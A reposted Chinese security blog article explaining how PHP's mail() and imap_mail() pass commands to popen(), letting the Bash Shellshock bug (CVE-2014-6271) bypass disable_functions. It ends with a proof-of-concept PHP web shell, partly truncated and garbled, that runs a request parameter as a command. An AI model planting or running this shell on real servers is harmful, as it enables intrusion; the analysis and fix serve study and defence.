先简单说一下php调用mail()函数的过程。 看到源码ext/mail.c 236行： char *sendmail_path = ini_str(sendmail_path); char *sendmail_cmd = null; 从ini中获得sendmail_path变量。我们看看php.ini里是怎么说明的： ; for unix only. you may supply argum
先简单说一下php调用mail()函数的过程。 
看到源码ext/mail.c
236行： 
char *sendmail_path = ini_str(sendmail_path); char *sendmail_cmd = null;
从ini中获得sendmail_path变量。我们看看php.ini里是怎么说明的：
; for unix only. you may supply arguments as well (default: sendmail -t -i). ;sendmail_path =
注释中可以看到，send_mail默认值为sendmail -t -i.
extra_cmd（用户传入的一些额外参数）存在的时候，调用spprintf将sendmail_path和extra_cmd组合成真正执行的命令行sendmail_cmd 。不存在则直接将sendmail_path赋值给sendmail_cmd 。
如下： if (!sendmail_path) { #if (defined php_win32 || defined netware) /* handle old style win smtp sending */ if (tsendmail(ini_str(smtp), &tsm_err, &tsm_errmsg, hdr, subject, to, message, null, null, null tsrmls_cc) == failure) { if (tsm_errmsg) { php_error_docref(null tsrmls_cc, e_warning, %s, tsm_errmsg); efree(tsm_errmsg); } else { php_error_docref(null tsrmls_cc, e_warning, %s, getsmerrortext(tsm_err)); } mail_ret(0); } mail_ret(1); #else mail_ret(0); #endif } if (extra_cmd != null) { spprintf(&sendmail_cmd, 0, %s %s, sendmail_path, extra_cmd); } else { sendmail_cmd = sendmail_path; }
之后执行：
#ifdef php_win32 sendmail = popen_ex(sendmail_cmd, wb, null, null tsrmls_cc); #else /* since popen() doesn't indicate if the internal fork() doesn't work * (e.g. the shell can't be executed) we explicitly set it to 0 to be * sure we don't catch any older errno value. */ errno = 0; sendmail = popen(sendmail_cmd, w); #endif
将sendmail_cmd丢给popen执行。
如果系统默认sh是bash，popen会派生bash进程。而之前的bash破壳（cve-2014-6271）漏洞，直接导致我们可以利用mail()函数执行任意命令，绕过disable_functions。
同样，我们搜索一下php的源码，可以发现，明里调用popen派生进程的php函数还有imap_mail，如果你仅仅通过禁用mail函数来规避这个安全问题，那么imap_mail是可以做替代的。当然，php里还可能有其他地方有调用popen或其他能够派生bash子进程的函数，通过这些地方，都可以通过破壳漏洞执行命令的。
影响版本：php 5.x 已测试，其他版本未测试
修复方法：修复cve-2014-6271
给出poc（http://www.exploit-db.com/exploits/35146/）如下：
$tmp 2>&1); // in safe mode, the user may only alter environment variableswhose names // begin with the prefixes supplied by this directive. // by default, users will only be able to set environment variablesthat // begin with php_ (e.g. php_foo=bar). note: if this directive isempty, // php will let the user modify any environment variable! mail(a@127.0.0.1,,,,-bv); // -bv so we don't actuallysend any mail $output = @file_get_contents($tmp); @unlink($tmp); if($output != ) return $output; else return no output, or not vuln.; } echo shellshock($_request[cmd]); ?>
本文出自：http://www.leavesongs.com/, 原文地址：http://www.leavesongs.com/php/php-bypass-disable-functions-by-cve-2014-6271.html, 感谢原作者分享。